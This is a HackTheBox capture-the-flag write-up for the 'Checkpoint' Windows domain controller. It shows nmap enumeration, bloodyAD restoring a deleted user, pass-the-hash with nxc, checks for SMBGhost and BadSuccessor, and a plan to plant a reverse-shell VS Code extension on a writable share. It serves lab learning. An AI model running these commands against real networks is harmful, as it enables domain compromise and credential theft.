~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • Wonderland
  • CHECKPOINT HTB


    This machine includes initial access credentials : username: alex.turner | password: Checkpoint2024!. 2024 might be an idea to look into, like its a web app that wouldn’t have been updated recently. First thing i notice from the nmap scan is that the machine is a Windows OS and it most likely has kerberos running on a domain controller(DC01), we might have to do some kerberoasting for tickets. Notably i tried connecting to the traceroute second address (10.10.14.1:4000) and the connection got refused, there’s a good chance we have to connect from 10.129.12.40 to 10.10.14.1:4000 or that we need to sign into kerberos first.

    Enumeration:

    nmap -sV -v -A -sC 10.129.12.40

    PORT     STATE SERVICE           VERSION
    53/tcp   open  domain            Simple DNS Plus
    88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2026-06-14 20:42:29Z)
    135/tcp  open  msrpc             Microsoft Windows RPC
    139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
    389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: checkpoint.htb, Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds?
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  ldapssl?
    3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: checkpoint.htb, Site: Default-First-Site-Name)
    3269/tcp open  globalcatLDAPssl?
    5985/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-title: Not Found
    |_http-server-header: Microsoft-HTTPAPI/2.0
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running (JUST GUESSING): Microsoft Windows 2022|11|2012|2016 (88%)
    OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
    Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows 11 24H2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.023 days (since Sun Jun 14 09:10:21 2026)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=259 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
    > Host script results:
    | smb2-security-mode: 
    |   3.1.1: 
    |_    Message signing enabled and required
    |_clock-skew: 6h59m58s
    | smb2-time: 
    |   date: 2026-06-14T20:42:45
    |_  start_date: N/A
    TRACEROUTE (using port 53/tcp)
    HOP RTT      ADDRESS
    1   72.29 ms 10.10.14.1
    2   73.23 ms checkpoint.htb (10.129.12.40) 

    bloodyad –host 10.129.14.173 –dns 10.129.14.173 -d checkpoint.htb -u alex.turner -p Checkpoint2024! get writable

    distinguishedName: CN=Deleted Objects,DC=checkpoint,DC=htb
    DACL: WRITE
    
    distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=checkpoint,DC=htb
    permission: WRITE
    
    distinguishedName: OU=Employees,DC=checkpoint,DC=htb
    permission: CREATE_CHILD
    
    distinguishedName: CN=Alex Turner,OU=Employees,DC=checkpoint,DC=htb
    permission: WRITE
    
    distinguishedName: CN=Mark Davies,OU=Employees,DC=checkpoint,DC=htb
    permission: WRITE
    
    distinguishedName: DC=checkpoint.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=checkpoint,DC=htb
    permission: CREATE_CHILD
    
    distinguishedName: DC=_msdcs.checkpoint.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=checkpoint,DC=htb
    permission: CREATE_CHILD 

    bloodyad –host 10.129.14.173 –dns 10.129.14.173 -d checkpoint.htb -u alex.turner -p Checkpoint2024! set restore mark.davies

    [+] mark.davies has been restored successfully under CN=Mark Davies,OU=Employees,DC=checkpoint,DC=htb

    Went to Cyberchef.org there’s a NTHASH encoder on there which we’re going to use on “Checkpoint2024!” as it is being reused for our disabled user: mark.davies. We double check by removing our password flag “-p” with -H for our hash, run that, hey it works, good. Now that we have READ,WRITE permissions on the DevDrop share. Seems like we could maybe inject a malicious extension for Vscode, so we need to make a Windows powershell reverse shell and embed it inside our vscode extension.

    n(xc smb 10.129.12.40 -d checkpoint.htb -u mark.davies -H “0B28E49D9DEB96F99D74578E214FAEC2” -M smbghost

    SMB 10.129.14.173 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:checkpoint.htb) (signing:True) (SMBv1:None)

    SMB 10.129.14.173 445 DC01 [+] checkpoint.htb.davies:0B28E49D9DEB96F99D74578E214FAEC2

    SMBGHOST 10.129.14.173 445 DC01 Potentially vulnerable to SMBGhost (CVE-2020-0796)

    nxc ldap 10.129.12.40 -d checkpoint.htb -u mark.davies -p Checkpoint2024! -m badsuccessor

    LDAP 10.129.31.247 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:checkpoint.htb) (signing:Enforced) (channel binding:No TLS cert)

    LDAP 10.129.31.247 389 DC01 [+] checkpoint.htb.davies:Checkpoint2024!

    BADSUCCE… 10.129.31.247 389 DC01 [+] Found domain controller with operating system Windows Server 2025: Unknown IP (DC01.checkpoint.htb)

    BADSUCCE… 10.129.31.247 389 DC01 [+] Found 2 results

    BADSUCCE… 10.129.31.247 389 DC01 alex.turner (S-1-5-21-3129162710-3498938529-1807524340-1101), OU=Employees,DC=checkpoint,DC=htb

    BADSUCCE… 10.129.31.247 389 DC01 ryan.brooks (S-1-5-21-3129162710-3498938529-1807524340-1103), OU=DMSAHolder,DC=checkpoint,DC=htb

    If we manage to get ryan.brooks permissions we should be able to make an badsuccessor attack and bind a dMSA account to admin giving us full access to the Domain controller.